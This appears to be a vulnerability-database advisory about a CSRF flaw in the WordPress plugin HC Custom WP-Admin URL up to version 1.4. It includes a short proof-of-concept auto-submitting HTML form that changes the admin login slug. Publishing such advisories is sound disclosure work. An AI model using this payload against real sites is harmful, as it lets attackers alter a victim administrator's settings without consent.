Lucene search

K
wpexploitDaniel RufWPEX-ID:BB0EFC5E-044B-47DC-9101-9AAE40CDBAA5
HistoryMay 18, 2022 - 12:00 a.m.

HC Custom WP-Admin URL <= 1.4 - Arbitrary Settings Update via CSRF

2022-05-1800:00:00
Daniel Ruf
70

0.001 Low

EPSS

Percentile

26.0%

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, allowing them to change the login URL

<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="custom_wpadmin_slug" value="secret">
</form>
<script>
    document.getElementById("test").submit();
</script>

0.001 Low

EPSS

Percentile

26.0%

Related for WPEX-ID:BB0EFC5E-044B-47DC-9101-9AAE40CDBAA5